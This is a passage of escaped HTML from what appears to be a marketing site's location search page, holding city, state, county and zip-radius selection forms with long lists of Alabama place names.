value=\"Cook Springs\">Cook Springs</option><option value=\"Coosada\">Coosada</option><option value=\"Cordova\">Cordova</option><option value=\"Cottondale\">Cottondale</option><option value=\"Cottonton\">Cottonton</option><option value=\"Cottonwood\">Cottonwood</option><option value=\"Courtland\">Courtland</option><option value=\"Cowarts\">Cowarts</option><option value=\"Coy\">Coy</option><option value=\"Cragford\">Cragford</option><option value=\"Crane Hill\">Crane Hill</option><option value=\"Creola\">Creola</option><option value=\"Cromwell\">Cromwell</option><option value=\"Cropwell\">Cropwell</option><option value=\"Crossville\">Crossville</option><option value=\"Cuba\">Cuba</option><option value=\"Cullman\">Cullman</option><option value=\"Cusseta\">Cusseta</option><option value=\"Dadeville\">Dadeville</option><option value=\"Daleville\">Daleville</option><option value=\"Danville\">Danville</option><option value=\"Daphne\">Daphne</option><option value=\"Dauphin Island\">Dauphin Island</option><option value=\"Daviston\">Daviston</option><option value=\"Dawson\">Dawson</option><option value=\"De Armanville\">De Armanville</option><option value=\"Deatsville\">Deatsville</option><option value=\"Decatur\">Decatur</option><option value=\"Deer Park\">Deer Park</option><option value=\"Delmar\">Delmar</option><option value=\"Delta\">Delta</option><option value=\"Demopolis\">Demopolis</option><option value=\"Detroit\">Detroit</option><option value=\"Dickinson\">Dickinson</option><option value=\"Dixons Mills\">Dixons Mills</option><option value=\"Docena\">Docena</option><option value=\"Dolomite\">Dolomite</option><option value=\"Dora\">Dora</option><option value=\"Dothan\">Dothan</option><option value=\"Double Springs\">Double Springs</option><option value=\"Douglas\">Douglas</option><option value=\"Dozier\">Dozier</option><option value=\"Duncanville\">Duncanville</option><option value=\"Dutton\">Dutton</option><option value=\"East Tallassee\">East Tallassee</option><option value=\"Eastaboga\">Eastaboga</option><option value=\"Echola\">Echola</option><option value=\"Eclectic\">Eclectic</option><option value=\"Edwardsville\">Edwardsville</option><option value=\"Eight Mile\">Eight Mile</option><option value=\"Elba\">Elba</option><option value=\"Elberta\">Elberta</option><option value=\"Eldridge\">Eldridge</option><option value=\"Elkmont\">Elkmont</option><option value=\"Elmore\">Elmore</option><option value=\"Elrod\">Elrod</option><option value=\"Emelle\">Emelle</option><option value=\"Empire\">Empire</option><option value=\"Enterprise\">Enterprise</option><option value=\"Epes\">Epes</option><option value=\"Equality\">Equality</option><option value=\"Estillfork\">Estillfork</option><option value=\"Ethelsville\">Ethelsville</option><option value=\"Eufaula\">Eufaula</option><option value=\"Eutaw\">Eutaw</option><option value=\"Eva\">Eva</option><option value=\"Evergreen\">Evergreen</option><option value=\"Excel\">Excel</option><option value=\"Fackler\">Fackler</option><option value=\"Fairfield\">Fairfield</option><option value=\"Fairhope\">Fairhope</option><option value=\"Falkville\">Falkville</option><option value=\"Faunsdale\">Faunsdale</option><option value=\"Fayette\">Fayette</option><option value=\"Fitzpatrick\">Fitzpatrick</option><option value=\"Five Points\">Five Points</option><option value=\"Flat Rock\">Flat Rock</option><option value=\"Flomaton\">Flomaton</option><option value=\"Florala\">Florala</option><option value=\"Florence\">Florence</option><option value=\"Foley\">Foley</option><option value=\"Forest Home\">Forest Home</option><option value=\"Forkland\">Forkland</option><option value=\"Fort Davis\">Fort Davis</option><option value=\"Fort Deposit\">Fort Deposit</option><option value=\"Fort Mitchell\">Fort Mitchell</option><option value=\"Fort Payne\">Fort Payne</option><option value=\"Fort Rucker\">Fort Rucker</option><option value=\"Fosters\">Fosters</option><option value=\"Franklin\">Franklin</option><option value=\"Frankville\">Frankville</option><option value=\"Frisco City\">Frisco City</option><option value=\"Fruitdale\">Fruitdale</option><option value=\"Fruithurst\">Fruithurst</option><option value=\"Fulton\">Fulton</option><option value=\"Fultondale\">Fultondale</option><option value=\"Furman\">Furman</option><option value=\"Fyffe\">Fyffe</option><option value=\"Gadsden\">Gadsden</option><option value=\"Gainestown\">Gainestown</option><option value=\"Gainesville\">Gainesville</option><option value=\"Gallant\">Gallant</option><option value=\"Gallion\">Gallion</option><option value=\"Gantt\">Gantt</option><option value=\"Garden City\">Garden City</option><option value=\"Gardendale\">Gardendale</option><option value=\"Gaylesville\">Gaylesville</option><option value=\"Geneva\">Geneva</option><option value=\"Georgiana\">Georgiana</option><option value=\"Geraldine\">Geraldine</option><option value=\"Gilbertown\">Gilbertown</option><option value=\"Glen Allen\">Glen Allen</option><option value=\"Glenwood\">Glenwood</option><option value=\"Goodsprings\">Goodsprings</option><option value=\"Goodwater\">Goodwater</option><option value=\"Goodway\">Goodway</option><option value=\"Gordo\">Gordo</option><option value=\"Gordon\">Gordon</option><option value=\"Goshen\">Goshen</option><option value=\"Grady\">Grady</option><option value=\"Graham\">Graham</option><option value=\"Grand Bay\">Grand Bay</option><option value=\"Grant\">Grant</option><option value=\"Graysville\">Graysville</option><option value=\"Green Pond\">Green Pond</option><option value=\"Greensboro\">Greensboro</option><option value=\"Greenville\">Greenville</option><option value=\"Grove Hill\">Grove Hill</option><option value=\"Grove Oak\">Grove Oak</option><option value=\"Guin\">Guin</option><option value=\"Gulf Shores\">Gulf Shores</option><option value=\"Guntersville\">Guntersville</option><option value=\"Gurley\">Gurley</option><option value=\"Hackleburg\">Hackleburg</option><option value=\"Haleyville\">Haleyville</option><option value=\"Hamilton\">Hamilton</option><option value=\"Hanceville\">Hanceville</option><option value=\"Hardaway\">Hardaway</option><option value=\"Harpersville\">Harpersville</option><option value=\"Hartford\">Hartford</option><option value=\"Hartselle\">Hartselle</option><option value=\"Harvest\">Harvest</option><option value=\"Hatchechubbee\">Hatchechubbee</option><option value=\"Hayden\">Hayden</option><option value=\"Hayneville\">Hayneville</option><option value=\"Hazel Green\">Hazel Green</option><option value=\"Headland\">Headland</option><option value=\"Heflin\">Heflin</option><option value=\"Helena\">Helena</option><option value=\"Henagar\">Henagar</option><option value=\"Higdon\">Higdon</option><option value=\"Highland Home\">Highland Home</option><option value=\"Hillsboro\">Hillsboro</option><option value=\"Hodges\">Hodges</option><option value=\"Hollins\">Hollins</option><option value=\"Holly Pond\">Holly Pond</option><option value=\"Hollytree\">Hollytree</option><option value=\"Hollywood\">Hollywood</option><option value=\"Holy Trinity\">Holy Trinity</option><option value=\"Honoraville\">Honoraville</option><option value=\"Hope Hull\">Hope Hull</option><option value=\"Horton\">Horton</option><option value=\"Houston\">Houston</option><option value=\"Huntsville\">Huntsville</option><option value=\"Hurtsboro\">Hurtsboro</option><option value=\"Huxford\">Huxford</option><option value=\"Ider\">Ider</option><option value=\"Irvington\">Irvington</option><option value=\"Jachin\">Jachin</option><option value=\"Jack\">Jack</option><option value=\"Jackson\">Jackson</option><option value=\"Jacksons Gap\">Jacksons Gap</option><option value=\"Jacksonville\">Jacksonville</option><option value=\"Jasper\">Jasper</option><option value=\"Jefferson\">Jefferson</option><option value=\"Jemison\">Jemison</option><option value=\"Jones\">Jones</option><option value=\"Joppa\">Joppa</option><option value=\"Kansas\">Kansas</option><option value=\"Kellerman\">Kellerman</option><option value=\"Kellyton\">Kellyton</option><option value=\"Kennedy\">Kennedy</option><option value=\"Kent\">Kent</option><option value=\"Killen\">Killen</option><option value=\"Kimberly\">Kimberly</option><option value=\"Kinston\">Kinston</option><option value=\"Knoxville\">Knoxville</option><option value=\"Laceys Spring\">Laceys Spring</option><option value=\"Lafayette\">Lafayette</option><option value=\"Lanett\">Lanett</option><option value=\"Langston\">Langston</option><option value=\"Lapine\">Lapine</option><option value=\"Lawley\">Lawley</option><option value=\"Leeds\">Leeds</option><option value=\"Leesburg\">Leesburg</option><option value=\"Leighton\">Leighton</option><option value=\"Lenox\">Lenox</option><option value=\"Leroy\">Leroy</option><option value=\"Lester\">Lester</option><option value=\"Letohatchee\">Letohatchee</option><option value=\"Lexington\">Lexington</option><option value=\"Lillian\">Lillian</option><option value=\"Lincoln\">Lincoln</option><option value=\"Linden\">Linden</option><option value=\"Lineville\">Lineville</option><option value=\"Lisman\">Lisman</option><option value=\"Little River\">Little River</option><option value=\"Livingston\">Livingston</option><option value=\"Loachapoka\">Loachapoka</option><option value=\"Lockhart\">Lockhart</option><option value=\"Locust Fork\">Locust Fork</option><option value=\"Logan\">Logan</option><option value=\"Louisville\">Louisville</option><option value=\"Lower Peach Tree\">Lower Peach Tree</option><option value=\"Lowndesboro\">Lowndesboro</option><option value=\"Loxley\">Loxley</option><option value=\"Luverne\">Luverne</option><option value=\"Lynn\">Lynn</option><option value=\"Madison\">Madison</option><option value=\"Magnolia\">Magnolia</option><option value=\"Magnolia Springs\">Magnolia Springs</option><option value=\"Malcolm\">Malcolm</option><option value=\"Malvern\">Malvern</option><option value=\"Maplesville\">Maplesville</option><option value=\"Marbury\">Marbury</option><option value=\"Margaret\">Margaret</option><option value=\"Marion\">Marion</option><option value=\"Marion Junction\">Marion Junction</option><option value=\"Mathews\">Mathews</option><option value=\"Maylene\">Maylene</option><option value=\"Mc Kenzie\">Mc Kenzie</option><option value=\"McCalla\">McCalla</option><option value=\"McIntosh\">McIntosh</option><option value=\"McShan\">McShan</option><option value=\"McWilliams\">McWilliams</option><option value=\"Megargel\">Megargel</option><option value=\"Melvin\">Melvin</option><option value=\"Mentone\">Mentone</option><option value=\"Meridianville\">Meridianville</option><option value=\"Mexia\">Mexia</option><option value=\"Midland City\">Midland City</option><option value=\"Midway\">Midway</option><option value=\"Millbrook\">Millbrook</option><option value=\"Millerville\">Millerville</option><option value=\"Millport\">Millport</option><option value=\"Millry\">Millry</option><option value=\"Minter\">Minter</option><option value=\"Mobile\">Mobile</option><option value=\"Monroeville\">Monroeville</option><option value=\"Montevallo\">Montevallo</option><option value=\"Montgomery\">Montgomery</option><option value=\"Montrose\">Montrose</option><option value=\"Moody\">Moody</option><option value=\"Mooresville\">Mooresville</option><option value=\"Morris\">Morris</option><option value=\"Morvin\">Morvin</option><option value=\"Moulton\">Moulton</option><option value=\"Moundville\">Moundville</option><option value=\"Mount Hope\">Mount Hope</option><option value=\"Mount Meigs\">Mount Meigs</option><option value=\"Mount Olive\">Mount Olive</option><option value=\"Mount Vernon\">Mount Vernon</option><option value=\"Mulga\">Mulga</option><option value=\"Munford\">Munford</option><option value=\"Muscadine\">Muscadine</option><option value=\"Muscle Shoals\">Muscle Shoals</option><option value=\"Myrtlewood\">Myrtlewood</option><option value=\"Nanafalia\">Nanafalia</option><option value=\"Natural Bridge\">Natural Bridge</option><option value=\"Nauvoo\">Nauvoo</option><option value=\"Needham\">Needham</option><option value=\"New Brockton\">New Brockton</option><option value=\"New Castle\">New Castle</option><option value=\"New Hope\">New Hope</option><option value=\"New Market\">New Market</option><option value=\"Newbern\">Newbern</option><option value=\"Newton\">Newton</option><option value=\"Newville\">Newville</option><option value=\"Normal\">Normal</option><option value=\"Northport\">Northport</option><option value=\"Notasulga\">Notasulga</option><option value=\"Oak Hill\">Oak Hill</option><option value=\"Oakman\">Oakman</option><option value=\"Odenville\">Odenville</option><option value=\"Ohatchee\">Ohatchee</option><option value=\"Oneonta\">Oneonta</option><option value=\"Opelika\">Opelika</option><option value=\"Opp\">Opp</option><option value=\"Orange Beach\">Orange Beach</option><option value=\"Orrville\">Orrville</option><option value=\"Owens Cross Roads\">Owens Cross Roads</option><option value=\"Oxford\">Oxford</option><option value=\"Ozark\">Ozark</option><option value=\"Paint Rock\">Paint Rock</option><option value=\"Palmerdale\">Palmerdale</option><option value=\"Panola\">Panola</option><option value=\"Pansey\">Pansey</option><option value=\"Parrish\">Parrish</option><option value=\"Pelham\">Pelham</option><option value=\"Pell City\">Pell City</option><option value=\"Pennington\">Pennington</option><option value=\"Perdido\">Perdido</option><option value=\"Perdue Hill\">Perdue Hill</option><option value=\"Perote\">Perote</option><option value=\"Peterman\">Peterman</option><option value=\"Peterson\">Peterson</option><option value=\"Petrey\">Petrey</option><option value=\"Phenix City\">Phenix City</option><option value=\"Phil Campbell\">Phil Campbell</option><option value=\"Piedmont\">Piedmont</option><option value=\"Pike Road\">Pike Road</option><option value=\"Pinckard\">Pinckard</option><option value=\"Pine Apple\">Pine Apple</option><option value=\"Pine Hill\">Pine Hill</option><option value=\"Pine Level\">Pine Level</option><option value=\"Pinson\">Pinson</option><option value=\"Pisgah\">Pisgah</option><option value=\"Pittsview\">Pittsview</option><option value=\"Plantersville\">Plantersville</option><option value=\"Pleasant Grove\">Pleasant Grove</option><option value=\"Point Clear\">Point Clear</option><option value=\"Prattville\">Prattville</option><option value=\"Princeton\">Princeton</option><option value=\"Quinton\">Quinton</option><option value=\"Ragland\">Ragland</option><option value=\"Rainbow City\">Rainbow City</option><option value=\"Rainsville\">Rainsville</option><option value=\"Ralph\">Ralph</option><option value=\"Ramer\">Ramer</option><option value=\"Ranburne\">Ranburne</option><option value=\"Randolph\">Randolph</option><option value=\"Range\">Range</option><option value=\"Red Bay\">Red Bay</option><option value=\"Red Level\">Red Level</option><option value=\"Reform\">Reform</option><option value=\"Remlap\">Remlap</option><option value=\"Repton\">Repton</option><option value=\"River Falls\">River Falls</option><option value=\"Riverside\">Riverside</option><option value=\"Roanoke\">Roanoke</option><option value=\"Robertsdale\">Robertsdale</option><option value=\"Rockford\">Rockford</option><option value=\"Rogersville\">Rogersville</option><option value=\"Russellville\">Russellville</option><option value=\"Rutledge\">Rutledge</option><option value=\"Ryland\">Ryland</option><option value=\"Safford\">Safford</option><option value=\"Saginaw\">Saginaw</option><option value=\"Saint Elmo\">Saint Elmo</option><option value=\"Saint Stephens\">Saint Stephens</option><option value=\"Salem\">Salem</option><option value=\"Salitpa\">Salitpa</option><option value=\"Samantha\">Samantha</option><option value=\"Samson\">Samson</option><option value=\"Saraland\">Saraland</option><option value=\"Sardis\">Sardis</option><option value=\"Satsuma\">Satsuma</option><option value=\"Sawyerville\">Sawyerville</option><option value=\"Sayre\">Sayre</option><option value=\"Scottsboro\">Scottsboro</option><option value=\"Seale\">Seale</option><option value=\"Section\">Section</option><option value=\"Selma\">Selma</option><option value=\"Seminole\">Seminole</option><option value=\"Semmes\">Semmes</option><option value=\"Shannon\">Shannon</option><option value=\"Sheffield\">Sheffield</option><option value=\"Shelby\">Shelby</option><option value=\"Shorter\">Shorter</option><option value=\"Shorterville\">Shorterville</option><option value=\"Silas\">Silas</option><option value=\"Siluria\">Siluria</option><option value=\"Silverhill\">Silverhill</option><option value=\"Sipsey\">Sipsey</option><option value=\"Skipperville\">Skipperville</option><option value=\"Slocomb\">Slocomb</option><option value=\"Smiths Station\">Smiths Station</option><option value=\"Somerville\">Somerville</option><option value=\"Spanish Fort\">Spanish Fort</option><option value=\"Spring Garden\">Spring Garden</option><option value=\"Springville\">Springville</option><option value=\"Spruce Pine\">Spruce Pine</option><option value=\"Stanton\">Stanton</option><option value=\"Stapleton\">Stapleton</option><option value=\"Steele\">Steele</option><option value=\"Sterrett\">Sterrett</option><option value=\"Stevenson\">Stevenson</option><option value=\"Stockton\">Stockton</option><option value=\"Sulligent\">Sulligent</option><option value=\"Sumiton\">Sumiton</option><option value=\"Summerdale\">Summerdale</option><option value=\"Sunflower\">Sunflower</option><option value=\"Sweet Water\">Sweet Water</option><option value=\"Sycamore\">Sycamore</option><option value=\"Sylacauga\">Sylacauga</option><option value=\"Sylvania\">Sylvania</option><option value=\"Talladega\">Talladega</option><option value=\"Tallassee\">Tallassee</option><option value=\"Tanner\">Tanner</option><option value=\"Theodore\">Theodore</option><option value=\"Thomaston\">Thomaston</option><option value=\"Thomasville\">Thomasville</option><option value=\"Thorsby\">Thorsby</option><option value=\"Tibbie\">Tibbie</option><option value=\"Titus\">Titus</option><option value=\"Toney\">Toney</option><option value=\"Town Creek\">Town Creek</option><option value=\"Townley\">Townley</option><option value=\"Toxey\">Toxey</option><option value=\"Trafford\">Trafford</option><option value=\"Trenton\">Trenton</option><option value=\"Trinity\">Trinity</option><option value=\"Troy\">Troy</option><option value=\"Trussville\">Trussville</option><option value=\"Tuscaloosa\">Tuscaloosa</option><option value=\"Tuscumbia\">Tuscumbia</option><option value=\"Tuskegee\">Tuskegee</option><option value=\"Tuskegee Institute\">Tuskegee Institute</option><option value=\"Tyler\">Tyler</option><option value=\"Union Grove\">Union Grove</option><option value=\"Union Springs\">Union Springs</option><option value=\"Uniontown\">Uniontown</option><option value=\"Uriah\">Uriah</option><option value=\"Valhermoso Springs\">Valhermoso Springs</option><option value=\"Valley\">Valley</option><option value=\"Valley Head\">Valley Head</option><option value=\"Vance\">Vance</option><option value=\"Vandiver\">Vandiver</option><option value=\"Verbena\">Verbena</option><option value=\"Vernon\">Vernon</option><option value=\"Vina\">Vina</option><option value=\"Vincent\">Vincent</option><option value=\"Vinegar Bend\">Vinegar Bend</option><option value=\"Vinemont\">Vinemont</option><option value=\"Vredenburgh\">Vredenburgh</option><option value=\"Wadley\">Wadley</option><option value=\"Wagarville\">Wagarville</option><option value=\"Walnut Grove\">Walnut Grove</option><option value=\"Ward\">Ward</option><option value=\"Warrior\">Warrior</option><option value=\"Waterloo\">Waterloo</option><option value=\"Watson\">Watson</option><option value=\"Wattsville\">Wattsville</option><option value=\"Waverly\">Waverly</option><option value=\"Weaver\">Weaver</option><option value=\"Webb\">Webb</option><option value=\"Wedowee\">Wedowee</option><option value=\"Wellington\">Wellington</option><option value=\"Weogufka\">Weogufka</option><option value=\"West Blocton\">West Blocton</option><option value=\"West Greene\">West Greene</option><option value=\"Westover\">Westover</option><option value=\"Wetumpka\">Wetumpka</option><option value=\"Whatley\">Whatley</option><option value=\"Wilmer\">Wilmer</option><option value=\"Wilsonville\">Wilsonville</option><option value=\"Wilton\">Wilton</option><option value=\"Winfield\">Winfield</option><option value=\"Wing\">Wing</option><option value=\"Woodland\">Woodland</option><option value=\"Woodstock\">Woodstock</option><option value=\"Woodville\">Woodville</option><option value=\"York\">York</option></select>\r\n                                                            </div>\r\n                                                        </td>\r\n                                                        <td align=\"left\">\r\n                                                            <div>\r\n                                                                <select name=\"state\" onchange=\"loadCities(this.value);\"><option value=\"AL\">AL</option><option value=\"AK\">AK</option><option value=\"AZ\">AZ</option><option value=\"AR\">AR</option><option value=\"CA\">CA</option><option value=\"CO\">CO</option><option value=\"CT\">CT</option><option value=\"DE\">DE</option><option value=\"DC\">DC</option><option value=\"FL\">FL</option><option value=\"GA\">GA</option><option value=\"HI\">HI</option><option value=\"ID\">ID</option><option value=\"IL\">IL</option><option value=\"IN\">IN</option><option value=\"IA\">IA</option><option value=\"KS\">KS</option><option value=\"KY\">KY</option><option value=\"LA\">LA</option><option value=\"ME\">ME</option><option value=\"MD\">MD</option><option value=\"MA\">MA</option><option value=\"MI\">MI</option><option value=\"MN\">MN</option><option value=\"MS\">MS</option><option value=\"MO\">MO</option><option value=\"MT\">MT</option><option value=\"NE\">NE</option><option value=\"NV\">NV</option>\r\n                                                                    <option value=\"NH\">NH</option><option value=\"NJ\">NJ</option><option value=\"NM\">NM</option>\r\n                                                                    <option value=\"NY\">NY</option><option value=\"NC\">NC</option><option value=\"ND\">ND</option><option value=\"OH\">OH</option><option value=\"OK\">OK</option><option value=\"OR\">OR</option><option value=\"PA\">PA</option><option value=\"RI\">RI</option><option value=\"SC\">SC</option><option value=\"SD\">SD</option><option value=\"TN\">TN</option><option value=\"TX\">TX</option><option value=\"UT\">UT</option><option value=\"VT\">VT</option><option value=\"VA\">VA</option><option value=\"WA\">WA</option><option value=\"WV\">WV</option><option value=\"WI\">WI</option><option value=\"WY\">WY</option></select>\r\n                                                            </div>\r\n                                                        </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_form('form_city');\">\r\n                                                        </td>\r\n                                                    </tr>\r\n\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n\r\n                                        <div id=\"dv_state\" class=\"hide\">\r\n                                            <form id=\"form_state\" name=\"form_state\" method=\"post\" action=\"http://www.emarketingsol.com/demo3.php\">\r\n\r\n                                                <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n\r\n                                                    <tbody><tr>\r\n\r\n                                                        <td>State: </td>\r\n\r\n                                                        <td style=\"padding-left:5px;\" valign=\"middle\"><select name=\"state\">\r\n                                                                <option value=\"\">Select State</option>\r\n                                                                <option value=\"AL\">Alabama</option><option value=\"AK\">Alaska</option><option value=\"AZ\">Arizona</option><option value=\"AR\">Arkansas</option><option value=\"CA\">California</option><option value=\"CO\">Colorado</option><option value=\"CT\">Connecticut</option><option value=\"DE\">Delaware</option><option value=\"DC\">District of Columbia</option><option value=\"FL\">Florida</option><option value=\"GA\">Georgia</option><option value=\"HI\">Hawaii</option><option value=\"ID\">Idaho</option><option value=\"IL\">Illinois</option><option value=\"IN\">Indiana</option><option value=\"IA\">Iowa</option><option value=\"KS\">Kansas</option><option value=\"KY\">Kentucky</option><option value=\"LA\">Louisiana</option><option value=\"ME\">Maine</option><option value=\"MD\">Maryland</option><option value=\"MA\">Massachusetts</option><option value=\"MI\">Michigan</option><option value=\"MN\">Minnesota</option><option value=\"MS\">Mississippi</option><option value=\"MO\">Missouri</option><option value=\"MT\">Montana</option><option value=\"NE\">Nebraska</option><option value=\"NV\">Nevada</option><option value=\"NH\">New Hampshire</option><option value=\"NJ\">New Jersey</option><option value=\"NM\">New Mexico</option><option value=\"NY\">New York</option><option value=\"NC\">North Carolina</option><option value=\"ND\">North Dakota</option><option value=\"OH\">Ohio</option><option value=\"OK\">Oklahoma</option><option value=\"OR\">Oregon</option><option value=\"PA\">Pennsylvania</option><option value=\"RI\">Rhode Island</option><option value=\"SC\">South Carolina</option><option value=\"SD\">South Dakota</option><option value=\"TN\">Tennessee</option><option value=\"TX\">Texas</option><option value=\"UT\">Utah</option><option value=\"VT\">Vermont</option><option value=\"VA\">Virginia</option><option value=\"WA\">Washington</option><option value=\"WV\">West Virginia</option><option value=\"WI\">Wisconsin</option><option value=\"WY\">Wyoming</option></select>\r\n\r\n\r\n\r\n                                                        </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_form('form_state');\">\r\n                                                        </td>\r\n\r\n                                                    </tr>\r\n\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n\r\n                                        <div id=\"dv_county\" class=\"hide\">\r\n\r\n                                            <form name=\"form_county\" id=\"form_county\" method=\"post\" action=\"http://www.emarketingsol.com/county.php\">\r\n                                                <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n                                                    <tbody><tr>\r\n                                                        <td>County: </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <div id=\"inner_counties\" style=\"width:125px;\">\r\n                                                                <select class=\"multiselect\" name=\"county\"><option value=\"Autauga\">Autauga</option><option value=\"Baldwin\">Baldwin</option><option value=\"Barbour\">Barbour</option><option value=\"Bibb\">Bibb</option><option value=\"Blount\">Blount</option><option value=\"Bullock\">Bullock</option><option value=\"Butler\">Butler</option><option value=\"Calhoun\">Calhoun</option><option value=\"Chambers\">Chambers</option><option value=\"Cherokee\">Cherokee</option><option value=\"Chilton\">Chilton</option><option value=\"Choctaw\">Choctaw</option>\r\n                                                                    <option value=\"Clarke\">Clarke</option><option value=\"Clay\">Clay</option><option value=\"Cleburne\">Cleburne</option><option value=\"Coffee\">Coffee</option><option value=\"Colbert\">Colbert</option><option value=\"Conecuh\">Conecuh</option><option value=\"Coosa\">Coosa</option><option value=\"Covington\">Covington</option><option value=\"Crenshaw\">Crenshaw</option><option value=\"Cullman\">Cullman</option><option value=\"Dale\">Dale</option><option value=\"Dallas\">Dallas</option>\r\n                                                                    <option value=\"De Kalb\">De Kalb</option><option value=\"Elmore\">Elmore</option><option value=\"Escambia\">Escambia</option><option value=\"Etowah\">Etowah</option><option value=\"Fayette\">Fayette</option><option value=\"Franklin\">Franklin</option><option value=\"Geneva\">Geneva</option><option value=\"Greene\">Greene</option><option value=\"Hale\">Hale</option><option value=\"Henry\">Henry</option><option value=\"Houston\">Houston</option><option value=\"Jackson\">Jackson</option><option value=\"Jefferson\">Jefferson</option><option value=\"Lamar\">Lamar</option>\r\n                                                                    <option value=\"Lauderdale\">Lauderdale</option><option value=\"Lawrence\">Lawrence</option><option value=\"Lee\">Lee</option><option value=\"Limestone\">Limestone</option><option value=\"Lowndes\">Lowndes</option><option value=\"Macon\">Macon</option><option value=\"Madison\">Madison</option><option value=\"Marengo\">Marengo</option><option value=\"Marion\">Marion</option><option value=\"Marshall\">Marshall</option><option value=\"Mobile\">Mobile</option>\r\n                                                                    <option value=\"Monroe\">Monroe</option><option value=\"Montgomery\">Montgomery</option><option value=\"Morgan\">Morgan</option><option value=\"Perry\">Perry</option><option value=\"Pickens\">Pickens</option><option value=\"Pike\">Pike</option><option value=\"Randolph\">Randolph</option><option value=\"Russell\">Russell</option><option value=\"Saint Clair\">Saint Clair</option><option value=\"Shelby\">Shelby</option><option value=\"Sumter\">Sumter</option><option value=\"Talladega\">Talladega</option><option value=\"Tallapoosa\">Tallapoosa</option><option value=\"Tuscaloosa\">Tuscaloosa</option><option value=\"Walker\">Walker</option><option value=\"Washington\">Washington</option><option value=\"Wilcox\">Wilcox</option><option value=\"Winston\">Winston</option></select>\r\n                                                            </div>\r\n                                                        </td>\r\n                                                        <td>\r\n                                                            <select name=\"state\" onchange=\"loadCounties(this.value);\"><option value=\"AL\">AL</option><option value=\"AK\">AK</option><option value=\"AZ\">AZ</option><option value=\"AR\">AR</option><option value=\"CA\">CA</option><option value=\"CO\">CO</option><option value=\"CT\">CT</option><option value=\"DE\">DE</option><option value=\"DC\">DC</option><option value=\"FL\">FL</option><option value=\"GA\">GA</option><option value=\"HI\">HI</option><option value=\"ID\">ID</option><option value=\"IL\">IL</option><option value=\"IN\">IN</option><option value=\"IA\">IA</option><option value=\"KS\">KS</option><option value=\"KY\">KY</option><option value=\"LA\">LA</option><option value=\"ME\">ME</option><option value=\"MD\">MD</option><option value=\"MA\">MA</option><option value=\"MI\">MI</option><option value=\"MN\">MN</option><option value=\"MS\">MS</option><option value=\"MO\">MO</option><option value=\"MT\">MT</option><option value=\"NE\">NE</option><option value=\"NV\">NV</option>\r\n                                                                <option value=\"NH\">NH</option><option value=\"NJ\">NJ</option><option value=\"NM\">NM</option>\r\n                                                                <option value=\"NY\">NY</option><option value=\"NC\">NC</option><option value=\"ND\">ND</option><option value=\"OH\">OH</option><option value=\"OK\">OK</option><option value=\"OR\">OR</option><option value=\"PA\">PA</option><option value=\"RI\">RI</option><option value=\"SC\">SC</option><option value=\"SD\">SD</option><option value=\"TN\">TN</option><option value=\"TX\">TX</option><option value=\"UT\">UT</option><option value=\"VT\">VT</option><option value=\"VA\">VA</option><option value=\"WA\">WA</option><option value=\"WV\">WV</option><option value=\"WI\">WI</option><option value=\"WY\">WY</option></select>\r\n                                                        </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_form('form_county');\">\r\n                                                        </td>\r\n                                                    </tr>\r\n\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n\r\n                                        <div id=\"dv_zip\" class=\"hide\">\r\n                                            <form id=\"form_zip\" name=\"form_zip\" method=\"post\" action=\"http://www.emarketingsol.com/demo.php\">\r\n                                                <table align=\"left\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n\r\n                                                    <tbody><tr>\r\n\r\n                                                        <td valign=\"middle\">Zip: </td>\r\n\r\n                                                        <td style=\"padding-left:5px;\" valign=\"middle\">\r\n                                                            <div style=\"float:left\">\r\n                                                                <input name=\"zip\" type=\"text\" size=\"10\" style=\"width:35px;\">\r\n                                                            </div>\r\n                                                            <div style=\"float:left; margin-left:9px; margin-top:6px;\"> within</div>\r\n                                                            <div style=\"float:left; margin-left:9px;\">\r\n                                                                <select name=\"miles\">\r\n                                                                    <option value=\"1\">1 mile</option>\r\n                                                                    <option value=\"2\">2 miles</option>\r\n                                                                    <option value=\"3\">3 miles</option>\r\n                                                                    <option value=\"4\">4 miles</option>\r\n\r\n                                                                    <option value=\"5\">5 miles</option>\r\n                                                                    <option value=\"6\">6 miles</option>\r\n                                                                    <option value=\"7\">7 miles</option>\r\n                                                                    <option value=\"8\">8 miles</option>\r\n                                                                    <option value=\"9\">9 miles</option>\r\n                                                                    <option value=\"10\">10 miles</option>\r\n                                                                    <option value=\"11\">11 miles</option>\r\n                                                                    <option value=\"12\">12 miles</option>\r\n                                                                    <option value=\"13\">13 miles</option>\r\n\r\n                                                                    <option value=\"14\">14 miles</option>\r\n                                                                    <option value=\"15\">15 miles</option>\r\n                                                                    <option value=\"16\">16 miles</option>\r\n                                                                    <option value=\"17\">17 miles</option>\r\n                                                                    <option value=\"18\">18 miles</option>\r\n                                                                    <option value=\"19\">19 miles</option>\r\n                                                                    <option value=\"20\">20 miles</option>\r\n                                                                    <option value=\"30\">30 miles</option>\r\n                                                                    <option value=\"40\">40 miles</option>\r\n\r\n                                                                    <option value=\"50\">50 miles</option>\r\n                                                                    <option value=\"75\">75 miles</option>\r\n                                                                    <option value=\"100\">100 miles</option>\r\n                                                                    <option value=\"125\">125 miles</option>\r\n                                                                    <option value=\"150\">150 miles</option>\r\n                                                                    <option value=\"175\">175 miles</option>\r\n                                                                    <option value=\"200\">200 miles</option>\r\n                                                                </select>\r\n                                                            </div>\r\n                                                        </td>\r\n                                                        <td style=\"padding-left:5px;\">\r\n                                                            <input type=\"button\" name=\"Submit\" value=\"Submit\" class=\"button-find\" onclick=\"submit_form('form_zip');\">\r\n                                                        </td>\r\n                                                    </tr>\r\n\r\n                                                </tbody></table>\r\n                                            </form>\r\n                                        </div>\r\n\r\n                                        <div id=\"dv_multiple_zip\" class=\"hide\">\r\n                                            <form id=\"form_multiple_zip\" 